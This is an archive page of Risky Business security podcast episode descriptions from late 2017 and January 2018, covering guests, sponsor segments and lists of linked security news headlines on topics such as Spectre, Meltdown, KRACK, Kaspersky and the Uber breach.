Show notes Linus Torvalds Thinks the Linux Spectre Patches are "UTTER GARBAGE" Dell Advising All Customers To Not Install Spectre BIOS Updates HP Reissuing BIOS Updates After Intel Meltdown and Spectre Updates Intel Halts Spectre/Meltdown Patching for Broadwell and Haswell Systems | Threatpost | The first stop for security news CoinReport Teetering Tether - CoinReport Evidence is mounting that much of the value in BTC may be artificial – James Crypto Hackers have stolen millions during the ICO craze, report says The $1.5b Bitcoin heist: Hackers have snatched 14 per cent of cryptocurrencies Inside The Fight For The Soul Of Kaspersky Lab Electoral Commission spent up to $8.6m counting ballots by hand after security concerns Facebook calls for cybersecurity research proposals as part of new grant program Less than 10 percent of Google users turn on two-factor authentication Hackers linked to Lebanese government caught in global cyber-espionage operation Google awards record $112,500 bug bounty for Android exploit chain Severe Electron framework vulnerability impacts apps like Skype and Slack Malicious Chrome extension is next to impossible to manually remove | Ars Technica Tinder's Lack of Encryption Lets Strangers Spy on Your Swipes | WIRED Blizzard Fixes DNS Rebinding Flaw that Put All the Company's Users at Risk British 15-year-old gained access to intelligence operations in Afghanistan and Iran by pretending to be head of CIA, court hears Canarytokens Canary — know when it matters

Risky Business #483 -- Internet censorship in Iran, China

Jan 17, 2018


On this week’s show we chat with Collin Anderson about Iranian internet censorship, as well as how sanctions on Iran led Google to block app engine access within Iran.

That’s a problem for Signal users there, because when the primary Signal servers are blocked, the software falls back to a domain-fronting approach that uses… drum roll please.. Google App Engine.

That’s a pretty wide ranging discussion of ‘net censorship in Iran and ‘net censorship generally and that’s coming up after the news.

This week’s show is brought to you by Bugcrowd, big thanks to them for that. In this week’s sponsor interview we’ll chat with Bugcrowd trust and security engineer Keith Hoodlet about some work they’ve been doing on producing detailed remediation information for their clients.

Adam Boileau is also along, as always, to discuss the week’s security news. The show notes/links are below, and you can follow Adam or Patrick on Twitter if that’s your thing.

Show notes Russian military was behind ‘NotPetya’ cyberattack in Ukraine, CIA concludes - The Washington Post Russian hacking group Fancy Bear prepares to attack Winter Olympics, U.S. Senate Experts link Shadow Brokers and Russia Did Twitter engineers just admit to shadow-banning conservatives? Nope | Ars Technica Twitter Says No, Hundreds Of Twitter Employees Are Not Reading Your DMs Apple hands Chinese iCloud to Guizhou-Cloud Big Data Industry • The Register Bitcoin, Ethereum and almost every other cryptocurrency is plunging | TechCrunch Bitcoin Blackmail by Snail Mail Preys on Those with Guilty Conscience — Krebs on Security Trisis has the security world spooked, stumped and searching for answers Skygofree: Following in the footsteps of HackingTeam - Securelist Serial SWATter Tyler “SWAuTistic” Barriss Charged with Involuntary Manslaughter — Krebs on Security Canadian Police Charge Operator of Hacked Password Service — Krebs on Security Who Ran — Krebs on Security FBI Director Calls Smartphone Encryption an 'Urgent Public Safety Issue' | Threatpost | The first stop for security news Microsoft adopts Signal's encryption protocol for new private conversation mode Flaw in WhatsApp and Signal exposes group chats to 'extremely difficult' hacks Alliance aims to thwart nosy Wi-Fi spies with new security standards Fourth Fappening Hacker Caught by the FBI Senators introduce bill to counter bad cybersecurity practices in credit reporting industry Facebook Knows How To Track You Using The Dust On Your Camera Lens | Gizmodo Australia VirusTotal's new graph feature maps malware House Votes to Reauthorize Controversial Spy Provision, Section 702 | Threatpost | The first stop for security news Intel AMT Loophole Allows Hackers to Gain Control of Some PCs in Under a Minute | Threatpost | The first stop for security news Lenovo Patches Networking OS Vulnerability Dating Back to 2004 | Threatpost | The first stop for security news VMware Issues 3 Critical Patches for vSphere Data Protection | Threatpost | The first stop for security news EMC, VMware security bugs throw gasoline on cloud security fire | Ars Technica BitTorrent users beware: Flaw lets hackers control your computer | Ars Technica 2018.01.09 Issue with TLS-SNI-01 and Shared Hosting Infrastructure - Incidents - Let's Encrypt Community Support Graham Cluley on Twitter: "They are clearly never going to have any problems with that Hawaiian missile alert menu ever again..." Microsoft and Amazon Enable Censorship Circumvention Tools in Iran. Why Doesn’t Google? - Motherboard Iran unblocks Telegram messenger service shut down during country-wide protests | News | DW | 14.01.2018

Risky Business #482 -- Meltdown and Spectre coverage without the flappy arms

Jan 10, 2018


On this week’s show Matt “pwnallthethings” Tait joins the show to walk us through the so-called Meltdown and Spectre bugs. Most of the coverage of the flaws has either been massively hyped or detail-free, and Matt pops by to untangle the whole mess. He does a great job of it, too.

This week’s show is brought to you by Cylance. CTO Rahul Kashyap will be along in the sponsor chair to talk about why so many AV packages were causing Windows boxes to BSOD when Microsoft pushed its Meltdown patch.

Adam Boileau is back in the news hotseat, and boy oh boy do we have a lot to cover. Show notes are below, and you can follow Adam or Patrick on Twitter if that’s your thing.

Show notes Intel CEO sold all the stock he could after Intel learned of security bug | Ars Technica Bad docs and blue screens make Microsoft suspend Spectre patch for AMD machines | Ars Technica MacOS LPE Exploit Gives Attackers Root Access | Threatpost | The first stop for security news Project Zero: aPAColypse now: Exploiting Windows 10 in a Local Network with WPAD/PAC and JScript NSA contractor pleads guilty to charge of hoarding troves of classified docs - Cyberscoop The Wassenaar Arrangement's latest language is making security researchers very happy White House Bans Staff From Using Personal Mobile Phones at Work - Bloomberg New Rules Announced for Border Inspection of Electronic Devices | Threatpost | The first stop for security news Facebook Is Disrupting North Korean Hacking Operations - Motherboard Game-changing attack on critical infrastructure site causes outage | Ars Technica I’m harvesting credit card numbers and passwords from your site. Here’s how. Man's Life Savings Stolen from Hardware Wallet Supplied by a Reseller - Bitcoin News Electrum Wallet Keys Could Be Snatched by Malicious Websites - Inside Bitcoins - News, Price, Events | Inside Bitcoins – News, Price, Events Mailgun Security Incident and Important Customer Information Reddit admits its email provider was hacked to steal Bitcoin Cash tips Oracle app server hack let one attacker mine $226,000 worth of cryptocoins | Ars Technica Jailed Russian says he can prove hack of DNC on Kremlin's orders Hackers take control of security firm’s domain, steal secret data | Ars Technica How Kaspersky’s Software Fell Under Suspicion of Spying on America - WSJ “Political pressure” reportedly kills Huawei/AT&T smartphone deal | Ars Technica Snowden’s App Probably Can’t Protect You From Targeted State Surveillance - Motherboard Twitter Promoted a Tweet That Steals Your Credit-Card Details Ukrainian hackers turn on own government to make it care about cybersecurity -Euromaidan Press | What Happens If Russia Attacks Undersea Internet Cables | WIRED Cyxtera Technologies to acquire offensive cyber firm Immunity Full Disclosure: CVE-2017-15944: Palo Alto Networks firewalls remote root code execution Ruben Berenguel, PhD on Twitter: "We’ve seen CPU usage go from ~20% to ~40% (and now critical machines with redundancy upscale under loads that before didnt made them blink). Costs this month in AWS will go up 10%, I predict (very least, haven’t checked EMR effect yet, if similar, 20-30%) #spectre #meltdown #fb" A collection of links to PDFs of papers on Micro-Architectural Attacks (sorted by date) by Paul Harvey - kernel, vulnerabilities, meltdown | Peerlyst Joanna Rutkowska on Twitter: "@tehjh @anders_fogh Something much simpler than what you did :) See below. This is part of the work Rafał Wojtczuk and I did back in 2010. It's no longer under…" CVE-2017-5753, CVE-2017-5715, and CVE-2017-5754 (Meltdown and Spectre) Windows antivirus patch compatibility Cylance | Meltdown and Spectre Vulnerabilities

Risky Business #481 -- Inside the Anthem breach with someone who was there

Dec 13, 2017


This is the last show for the year, Risky Business will return on January 10th 2018.

In this week’s feature Stephen Moore joins us. He was formerly the Staff Vice President of Cyber Security Analytics at Anthem, the healthcare company that was spectacularly owned by a Chinese APT crew in 2015.

Instead of us all just saying “lol they got owned, they’re idiots,” I thought it would be a good idea to actually talk to someone who was there. As you’ll hear, Anthem’s team knew they were being targeted by an APT crew, did its best to fend off the attackers, but sadly they lost anyway.

It’s sobering listening.

This week’s sponsor interview is also just great. We’ll check in with Casey Ellis of Bugcrowd. He’ll be along to talk about this whole Uber mess. A lot of the reporting around the so-called Uber data breach seemed to fixate a bit on the fact that the attacker was paid via the HackerOne bug bounty platform. The coverage has conflated extortion with bug bounty programs, much to Casey’s dismay. He’ll be along later to share his views on what the Uber snafu means, as well as to share his thoughts on DJI’s disastrous bug bounty program.

Adam Boileau, as usual, stops by to discuss the week’s security news, and also to wrap up the 2017 season.

Links to everything are below, and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes 1.4 Billion Clear Text Credentials Discovered in a Single Database APT 34 Is an Iran-Linked Hacking Group That Probes Critical Infrastructure | WIRED This country's hacking efforts have become too big to ignore Popular Destinations rerouted to Russia | BGPmon Italian Prosecutor Makes Request to Close Hacking Team Investigation - Motherboard Jailed Russian hacker: I hacked Democrats 'under the command' of Russian intelligence agents | Business Insider Australia Seeks New Gag Laws That Could See Journalists And Whistleblowers Jailed for 20 Years Mark Di Stefano 🤙🏻 on Twitter: "Twitter says it's removing 3.2 million accounts every single week. A staggering number." Phishers Are Upping Their Game. So Should You. — Krebs on Security It's easy to fake Extended Validation certificates, research shows - Cyberscoop On the value of EV - Google Groups Nope, this isn’t the HTTPS-validated Stripe website you think it is | Ars Technica Hackers hit key ATM network in crime spree that clears $10 million | Ars Technica Want to Launder Bitcoins? How Crooks Are Hacking iTunes and Getting Paid by Apple Google Releases Tool To Help iPhone Hackers - Motherboard Android Flaw Allows Attackers to Poison Signed Apps with Malicious Code | Threatpost | The first stop for security news Tim Watts MP on Twitter: "Hey @riskybusiness - can the Australian political figure single tweet hacker be this week's skateboarding dog?" Ambassador Joe Hockey's account 'likes' tweet calling Malcolm Turnbull a 'cranky prick' Mike Arpaia on Twitter: "@dinodaizovi @riskybusiness Even if you're blocking and doing the analysis on the host, that takes cycles for you to make your decision. Nothing is"real time", it's all…" Airlock Digital - News

Risky Biz Soap Box: Bromium on custom microvirtualization for legacy apps

Dec 11, 2017


Today’s Soap Box is brought to you by Bromium.

Bromium makes a security suite that wraps key applications in microvisors. It’s a way to get app-specific, hardware-based virtualisation.

Historically Bromium has wrapped things like browsers and the office suite into these microvisors. Bromium has also found a lot of success in selling to organisations that have to run out-of-date browsers and Java. Wrapping an old browser in Bromium actually does make it safe to use.

Well, now they’ve gone a step further. They’ve launched secure app extensions, which is where they custom-wrap your application, or an application you use, into a microvisor. So if you’re using some awful, old, insecure enterprise app and it’s keeping you awake at night, this might be a solution for you if you can’t rip and replace.

Have a listen!

Show notes [pdf] Securing Legacy Applications with Bromium Application Isolation and Control

Risky Business #480 -- Uber, Kaspersky woes continue

Dec 6, 2017


On this week’s show we’ll be having a look at the latest OWASP top 10. As many of you would know, the new list is out. A couple of items have been dropped and a couple of items have been introduced. But we’re really using this new top 10 as an excuse to have a broader chat about the top 10 and the OWASP mission more generally.

As you’ll hear, everyone seems to agree the list is a good thing, but maybe OWASP needs to sharpen its communication strategy a little to make itself more accessible to the developers it’s trying to help.

We’ll hear from OWASP Bristol chapter leader and Veracode consultant Katy Anton on that, as well as Safestack head honcho Laura Bell and penetration tester and founder of Matchme consulting Pam O’Shea.

This week’s show is brought to you by a first time sponsor, VMRAY. They make malware analysis software that’s very popular with CERTs, but I suspect a lot of listeners out there in IR will also be interested in what they’re doing. The core offering is a cloud malware analyser that isn’t public, so if you don’t want to fire off a sample to VirusTotal and let the bad guys know you’re on to them, VMRAY is a better option.

VMRAY didn’t actually get one of its staff into this week’s sponsor slot, it chose one of its users instead – Koen Van Impe. He pops along to talk through what he uses VMRAY for and to give us a bit of an overview of what it does.

Links to everything are below, and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes Uber security executives leave company amid lawsuit and breach investigation Proposed law would jail execs who fail to report data breaches – Naked Security U.K. cyber agency tells government to handle Russian anti-virus software with caution Former N.S.A. Employee Pleads Guilty to Taking Classified Information - The New York Times Ex-NSA Hackers Worry China And Russia Will Try to Arrest Them - Motherboard The US Should Modernize Election Systems to Prevent Hacking | WIRED Russia Wants to Launch Backup DNS System by August 1, 2018 How DJI fumbled its bug bounty program and created a PR nightmare DHS: Drone Maker "Likely" Helping China Spy on US The EU Will Foot the Bill for VLC Player's Public Bug Bounty Program Privacy regulator warns MPs over shared passwords - BBC News SEC Halts a Silly Initial Coin Offering - Bloomberg ‘Mailsploit’ Lets Hackers Forge Perfect Email Spoofs | WIRED Andromeda botnet mastermind arrested in Belarus, identified by his ICQ number Hacked Password Service Leakbase Goes Dark — Krebs on Security Dell, Other Vendors Start Shipping Laptops With Intel ME Firmware Disabled Satori Botnet Has Sudden Awakening With Over 280,000 Active Bots Cisco Patches Critical Playback Bugs in WebEx Players | Threatpost | The first stop for security news Flaw Found In Dirty COW Patch | Threatpost | The first stop for security news GitHub will soon warn developers of insecure dependencies, adds news feed, team chat and more Man Hacks Jail Computer Network to Get Friend Released Early Malware Detection & Malware Sandbox Analysis | VMRay Securing Ethereum at Empire Hacking | Trail of Bits Blog Careers at Fitbit

Snake Oilers #4: Dino Dai Zovi, Chris McNab and Sylvain Gil

Dec 4, 2017


We’ll be hearing from three vendors in this edition of Oilers. Dino Dai Zovi will be along first up to talk about his startup, Capsule8, which looks very promising indeed.

After we’ve heard from Dino we’ll be chatting with Chris McNab. He used to run incident response for iSec Partners and later NCC Group, but these days he runs AlphaSOC, a company he founded. They’re a very simply play – they do DNS and IP analytics.

They offer that as a Splunk application or via an API, and you would be amazed how much bad stuff you can kick off your network with something as simple as DNS and IP analytics. Tor exfil, whole families of malware, BitTorrent, all sorts of stuff. Chris will be along soon to talk about that.

Then we’re rounding it out with a conversation with Sylvain Gil, the co-founder of Exabeam.

Exabeam started off in analytics and UEBA, but they’ve taken a bunch of money and they’re spending it on building out their SIEM, which is already pretty popular in certain circles because they don’t license it based on volume. Sylvain pops along later on to talk about how that’s changing SIEM use cases for a bunch of people. For example they can pump their EDR logs into their SIEM without wearing a seven figure SIEM consumption bill. He also walks through how they’ve used open source technologies like Hadoop in their products. It’s an all around chat that one, not so much a pitch, but yeah, I found it really interesting and I hope you will too.

Links to all three profiled vendors are below!

Show notes Capsule8 AlphaSOC GitHub - alphasoc/nfr: A utility to score DNS traffic via the AlphaSOC API and identify security threats Security Intelligence | SIEM & UEBA | Exabeam

Risky Business #479 -- Oh, Uber. Oh, Apple.

Nov 29, 2017


On this week’s show we’re speaking with Susan Hennessey, a Fellow in National Security in Governance Studies at the Brookings Institution and managing editor of Lawfare. We’re talking to her about cross-border law enforcement in the Internet age.

We hear a lot of people in the infosec community expressing some discomfort with the FBI’s use of Network Investigative Techniques designed to de-cloak Tor users. Susan pops by to explain why the FBI and other law enforcement bodies aren’t worried about the international ramifications of dropping de-cloaking technique on the whole planet.

We also cover off a few of the other issues around how data can be turned over to various governments. It’s a fascinating chat and it’s coming up after the news.

This week’s show is brought to you by Tenable Security. In this week’s sponsor slot we’ll be hearing from Ray Komar, Tenable’s VP of technical alliances. We’re talking to Ray about a partnership Tenable has formed with Siemens. They’re trying to tackle the issue of tracking vulnerabilities in industrial control system equipment, but as you’ll hear, people aren’t actually buying it so much for the vulnerability tracking side, they’re buying it for the visibility side. It turns out dropping a passive scanner on your ICS network is a good way to know what’s actually ON your ICS network.

As always, Adam Boileau pops in to discuss the security news. We cover:

The Uber hack Apple’s comedy “root” bug Krebs on possible Shadowbrokers link Charges against more Chinese APT operators and Iranian HBO attacker More “hack back” legislation action Intel ME bug details Golden SAML MOAR

Links to everything are below, and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes Uber Hid 57-Million User Data Breach For Over a Year | WIRED Lawmakers demand answers from Uber after massive data breach - Cyberscoop Apple MacOS High Sierra Security Flaw Lets Anyone Get Root Access, No Password Required | WIRED Who Was the NSA Contractor Arrested for Leaking the ‘Shadow Brokers’ Hacking Tools? — Krebs on Security DOJ reveals indictment against Chinese cyber spies that stole U.S. business secrets China hides homegrown hacks from its vulnerability disclosure process Feds Indict Iranian for HBO Hack—But Extradition Isn't Likely | WIRED Guilty plea for Canadian charged in 2014 Yahoo hacking case Rep. Graves: 'Active defense' bill will launch a new industry Intel Management Engine Flaws Leave Millions of PCs Exposed | WIRED mjg59 | Potential impact of the Intel ME vulnerability Researcher discovers classified Army intel app, data on open public AWS bucket | Ars Technica How Bots Broke the FCC's Public Comment System During the Net Neutrality Debate | WIRED Newly Published Exploit Code Used to Spread Mirai Variant | Threatpost | The first stop for security news Fund Targets Victims Scammed Via Western Union — Krebs on Security No Patch Available for RCE Bug Affecting Half of the Internet's Email Servers Golden SAML: Newly Discovered Attack Technique Forges Authentication to Cloud Apps - CyberArk Could Terrorists Hack an Airplane? The Government Just Did. Symantec Encryption Desktop Local Privilege Escalation – Exploiting an Arbitrary Hard Disk Read/Write Vulnerability Over NTFS – Nettitude Labs Patrick Gray on Twitter: "So the password Wikiloons sent Jnr wasn’t a CMS password, it was just used to get to a content preview. A dozen outlets had the password, so…"

Risky Business #478 -- Why a "Digital Geneva Convention" won't work

Nov 15, 2017


On this week’s show we check in with Mara Tam. She’ll be telling us why the idea of a so-called “Digital Geneva Convention” is silly.

Then, after that, Rich Smith of Duo Security will be in the sponsor chair.

You may have heard about some recent research Duo Labs did into Apple EFI patches basically not working/sticking. Rich walks us through that research, why Duo did it, how they did it, and what it can tell us. It might be Mac research but the real worry, as you’ll hear, is around Wintel firmware.

Adam Boileau pops by for this week’s news discussion. We’ll be covering:

Facebook’s plan to combat “non-consensual intimate imagery” Wikileaks Vault8 leaks Assange sending a “guessed” password to Donald Trump Jnr NYTimes reports on the Shadowbears Cracking FaceID with a rubber mask MOAR

Links to everything are below, and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes Facebook Workers, Not an Algorithm, Will Look at Volunteered Nude Photos First to Stop Revenge Porn The Facts: Non-Consensual Intimate Image Pilot | Facebook Newsroom If Facebook Actually Wants to Be Transparent, It Should Talk to Journalists - Motherboard WikiLeaks Starts Releasing Source Code For Alleged CIA Spying Tools - Motherboard Donald Trump Jr. and WikiLeaks Talking Privately on Twitter Makes Perfect Sense | WIRED WikiLeaks on Twitter: "New WikiLeaks publication reveals CIA wrote code to impersonate Kaspersky Labs anti-virus company" Donald Trump Jr. on Twitter: "Here is the entire chain of messages with @wikileaks (with my whopping 3 responses) which one of the congressional committees has chosen to…" Security Breach and Spilled Secrets Have Shaken the N.S.A. to Its Core - The New York Times Hackers say they broke Apple’s Face ID. Here’s why we’re not convinced | Ars Technica Hackers Say Plastic Surgeon to the Stars Hacked Back at Them Uber drivers in Lagos, Nigeria use fake Lockito app to boost fares — Quartz CEO who presided over Mt. Gox’s collapse could end up with massive profits | Ars Technica Google Begins Removing Play Store Apps Misusing Android Accessibility Services | Hackbusters OnePlus inadvertently left a backdoor on its phones Muslim activists hack Isis mailing list hours after terrorists claimed it was unhackable | The Independent This AI Bot That Messes With Email Scammers As Long As Possible Is Brilliant - Digg The FBI Blindly Hacked Computers in Russia, China, and Iran Huddle's 'highly secure' work tool exposed KPMG and BBC files - BBC News Microsoft Provides Guidance on Mitigating DDE Attacks | Threatpost | The first stop for security news How AV can open you to attacks that otherwise wouldn’t be possible | Ars Technica Cryptojacking craze that drains your CPU now done by 2,500 sites | Ars Technica Crooks sending fake Apple emails in order to unlock stolen iPhones Hacker Wannabes Fooled by Backdoored IP Scanner Cyber Security | Global Cyber Security Services Provider About the security content of iOS 11 - Apple Support Microsoft's Smith adds 'cyber Red Cross' to his 'digital Geneva Convention' call thinkst Thoughts...: A Geneva convention, for Software thinkst Thoughts...: On anti-patterns for ICT security and international law The need for a Digital Geneva Convention - Microsoft on the Issues The Apple of Your EFI: Mac Firmware Security Research | Duo Security

Risky Business #477 -- US mulls charges against Russian officials involved in DNC hack

Nov 8, 2017


There’s no feature interview in this week’s edition, just a slightly longer news session with Adam Boileau, then it’s straight into this week’s sponsor interview.

Adam and I will be speaking about:

Charges against Russian officials involved in the DNC hack Confirmation of Russian involvement in Ukraine artillery targeting app Attribution claims in Bad Rabbit campaign “Hack Back” bill is picking up steam 1 million installations of counterfeit WhatsApp clone A properly awful Tor browser bug The cryptocurrency comedies/tragedies of the week MOAR

Marco Slaviero is this week’s sponsor guest. He’ll be along with a radical marketing approach: He’ll be telling us what Canaries can’t do! But you know what? It’s a useful thought exercise. He’ll also update us on the latest stuff they’re doing in the cloud. They’ve got some new VMWare virtual canaries too.

Links to everything are below, and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes US could charge six Russian officials over DNC email hacking Russia hackers had targets worldwide, beyond US election - The Washington Post Tracing Fancy Bear’s paw prints – Raphael – Medium The GRU-Ukraine Artillery Hack That May Never Have Happened How Hackers Broke Into John Podesta and Colin Powell’s Gmail Accounts - Motherboard Ukraine blames infamous Russian hackers for 'BadRabbit' ransomware attack Chinese hackers starting to return focus to U.S. corporations 'Hack back' bill gains 7 new co-sponsors Ex-NSA Director Says Companies Should Never Hack Back Because They Could Start Wars - Motherboard How Level 3's Tiny Error Shut Off the Internet for Parts of the US | WIRED More Than 1 Million People Downloaded a Fake WhatsApp Android App - Motherboard Beating the iPhone X Face ID Is Hard. We Know, Because We Tried | WIRED Flaw crippling millions of crypto keys is worse than first disclosed | Ars Technica Critical Tor flaw leaks users’ real IP address—update now | Ars Technica Stuxnet-style code signing is more widespread than anyone thought | Ars Technica SEC warns that celebrity cryptocurrency endorsements may be illegal | Ars Technica Dan Guido on Twitter: "Parity likely did not think of their wallet as a classic contract. Their code is in a library, and they delegatecall to execute it directly." One Bitcoin Transaction Now Uses as Much Energy as Your House in a Week - Motherboard More than two years after historic breach, OPM continues to struggle with cybersecurity Texas Shooter's Phone Encrypted | Threatpost | The first stop for security news Chain of 11 Bugs Takes Down Galaxy S8 at Mobile Pwn2Own | Threatpost | The first stop for security news Patrick Gray on Twitter: "Oh my fucking god."

Snake Oilers #3: Bot prevention and distributed "crypto magic" credit card storage

Nov 6, 2017


In this edition of Snake Oilers we’re taking a look at two Australian companies and their solutions: Kasada and Haventec.

Kasada’s product is a simple one – it’s bot prevention using proof of work and a couple of other things, and Haventech’s solution is a bit more out there.

They’ve got a couple of products. One uses device fingerprinting plus a secret for authentication, but they’ve actually come up with something else that’ll be really interesting to people in the payment card processing space.

Basically they’ve come up with a way to split credit card info into a few pieces so it can be stored in a distributed way. Part of the info with the user, part with the merchant and part with the processor. It’s a better approach than tokenisation, and will drastically reduce the liability and costs that comes with storing huge amounts of card data on the processor side. Oh, and they’ve solved the chargeback problem on that one too.

Links to the companies profiled can be found below. I hope you enjoy the show!

Show notes Kasada | Security Redefined Haventec | Revolutionising cyber security Home - Australian Cyber Security Growth Network

Risky Business #476 -- Zeynep Tufekci on machine learning and disinformation

Nov 1, 2017


On this week’s show we’re chatting with Zeynep Tufekci about how machine learning accelerates the dissemination of crazy s–t, basically. Zeynep’s September TED talk titled “We’re building a dystopia just to make people click on ads” is a must watch and has been doing the rounds on infosec Twitter over the last couple of weeks. She joins us this week to talk through what we might be able to do about the tendency of online platforms to send people down pretty warped rabbit holes. That’s a fascinating chat.

This week’s show is brought to you by Senetas.

Senetas is a Melbourne-based company that develops and manufactures layer 2 encryption gear. They also operate the SureDrop secure file sharing platform and are working on a bunch of cloud crypto tech as well. Julian Fay is CTO over at Senetas and he’s along this week to talk us through the bugs Matthew Green and his colleagues found in a bunch of FIPS-certified gear from Fortinet. It’s a really, really illuminating chat. I love it when Julian’s in the sponsor chair because I always learn a lot.

Links to everything are below, and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes Infrastructure for the ‘Bad Rabbit’ Ransomware Appears to Have Shut Down - Motherboard Global ransomware attacks tiptoed around Russian anti-virus products NotPetya ransomware cost Merck more than $310 million British security minister says North Korea was behind WannaCry hack on NHS | The Independent Worker who snuck NSA malware home had his PC backdoored, Kaspersky says | Ars Technica Proud to keep on protecting ' no matter the false allegations in the U.S. media. | Nota Bene: Eugene Kaspersky's Official Blog Equifax Was Warned - Motherboard China Tests the Limits of Its US Hacking Truce | WIRED Google: Chrome is backing away from public key pinning, and here's why | ZDNet YubiHSM 2 is here: Providing root of trust for servers and computing devices | Yubico Francisco Partners Acquires Comodo's SSL Security Business Google's reCaptcha Cracked Again | Threatpost | The first stop for security news Unexplained cyberattacks sow chaos among dark web markets The Fight Over Jordan Hamlett’s ‘Hack’ of Trump’s Tax Returns Facebook, Google, Twitter tell Congress their platforms spread Russian-backed propaganda | Ars Technica LSE Business Review – Blockchain and bitcoin: In search of a critique A Guide to Attacking Domain Trusts – harmj0y Fooling Neural Networks in the Physical World with 3D Adversarial Objects · labsix Training Zeynep Tufekci: We're building a dystopia just to make people click on ads | TED Talk | Attack of the week: DUHK – A Few Thoughts on Cryptographic Engineering Senetas - a leading provider of high-assurance encryption

Risky Business #475 -- Matt Tait: US gov needs to put up or shut up on Kaspersky claims

Oct 25, 2017


On this week’s show we’re catching up with Matt Tait. Matt’s better known as @pwnallthethings on Twitter. He’s joining us this week to talk about the claims various sources have made against Kaspersky. I say sources because up to this point the only thing we’ve seen is various officials saying people shouldn’t use it. There’s been no official statement from the government or the intelligence community that actually says “don’t use it”.

And the situation is getting ridiculous. It’s as clear as mud right now, basically, so Matt will be along later to argue the US government really just needs to back the claims in an official way if they’re to be taken seriously.

This week’s show is brought to you by Cylance. This week we’re chatting to Chris Coulter, a seasoned IR professional who’s recently moved from the services arm of Cylance to the product side. We’ll be talking to Chris about IR and where EDR software is going. That one is really worth listening to. It’s easy to look at Cylance today and just see another antivirus company. People have forgotten that they basically shook up the biggest market in infosec and I think they have a solid chance of doing the same thing with a few of their upcoming releases in the EDR and UBA space. So yeah, check out that sponsor interview with Chris Coulter, coming up towards the back of the show!

Links to everything are below, and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes 'BadRabbit' ransomware spreading across Ukraine, Russia Reaper: Calm Before the IoT Security Storm? — Krebs on Security Cisco's Talos Intelligence Group Blog: “Cyber Conflict” Decoy Document Used In Real Cyber Conflict How Russian Firm Might Have Siphoned Tools From the NSA Senator questions DHS's handling of Kaspersky software ban in federal agencies Your ID number may be public - SA data leak is worse than you think - Revealed: the real source of SA's massive data breach - TechCentral Whois Maintainer Accidentally Makes Password Hashes Available For Download | Threatpost | The first stop for security news Beaumont Porg, Esq. on Twitter: "Remember the Word DDE issue found by @sensepost? Copy the DDE from Word into Outlook, then email it to somebody.. No attachment -> calc." DUHK Attack Exposes Gaps in FIPS Certification | Threatpost | The first stop for security news New OWASP Top 10 includes Apache Struts-type vulns, XXE and poor logging High-severity vulnerability found in SecureDrop system China's vulnerability disclosure system twice as fast as U.S. version The Dark Web’s Most Notorious Thief, Phishkingz, Gets Doxxed Hackers Steal Photos From Plastic Surgeon to the Stars, Claim Trove Includes Royals DHS Alert on Dragonfly APT Contains IOCs, Rules Likely to Trigger False Positives | Threatpost | The first stop for security news The hacker known as "Alex" — Operation Luigi: How I hacked my friend without her noticing

Risky Business #474 -- Inside new, "invisible" Rowhammer attacks

Oct 18, 2017


On this week’s show we’re chatting with Daniel Gruss an infosec researcher doing a postdoc in the Secure Systems group at the Graz University of Technology in Austria.

Daniel was one of the authors of a recent paper on a new Rowhammer technique. This one’s pretty clever, basically because it evades all known detection techniques by executing in an Intel SGX enclave.

In this week’s feature interview we chat with Dan Guido from Trail of Bits. He’s along this week to talk about his experience in helping to build secure software and security tools for his clients.

Of course the big news this week are the so-called “KRACK” attacks against WPA2. Adam’s done his homework on that and joins the news segment to tell you all how bad it is. We also look at the RNG bugs making life hard for smart card vendors and all the other news of the week!

Links to everything are below.

Oh, and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes What You Should Know About the ‘KRACK’ WiFi Security Weakness — Krebs on Security Falling through the KRACKs – A Few Thoughts on Cryptographic Engineering Factorization Flaw in TPM Chips Makes Attacks on RSA Private Keys Feasible | Threatpost | The first stop for security news Millions of high-security crypto keys crippled by newly discovered flaw | Ars Technica 'Hacking back' legislation is back in Congress The World Once Laughed at North Korean Cyberpower. No More. - The New York Times North Korean Hackers Used Hermes Ransomware to Hide Recent Bank Heist Beaumont Porg, Esq. on Twitter: "Ukraine Intelligence Agency warning of planned large scale disk wiping attack using supply chain:" October Price Adjustment — Steemit Secret F-35, P-8, C-130 data stolen in Australian defence contractor hack | ZDNet Cyberespionage Group Steps Up Campaigns Against Japanese Firms | Threatpost | The first stop for security news Middle Eastern hacking group is using FinFisher malware to conduct international espionage Exclusive: Microsoft responded quietly after detecting secret database hack in 2013 Equifax website borked again, this time to redirect to fake Flash update | Ars Technica Google’s strongest security, for those who need it most Russia Fines Telegram $14,000 for Not Giving FSB an Encryption Backdoor Web-connected household devices to face mandatory rating over spying fears Want to see something crazy? Open this link on your phone with WiFi turned off. Sexual assault allegations levied against high profile security researcher and activist - The Verge Leveraging the Analog Domain for Security (LADS) Key Reinstallation Attacks: Forcing Nonce Reuse in WPA2 KRACK Attacks: Bypassing WPA2 against Android and Linux - YouTube [1710.00551] Another Flip in the Wall of Rowhammer Defenses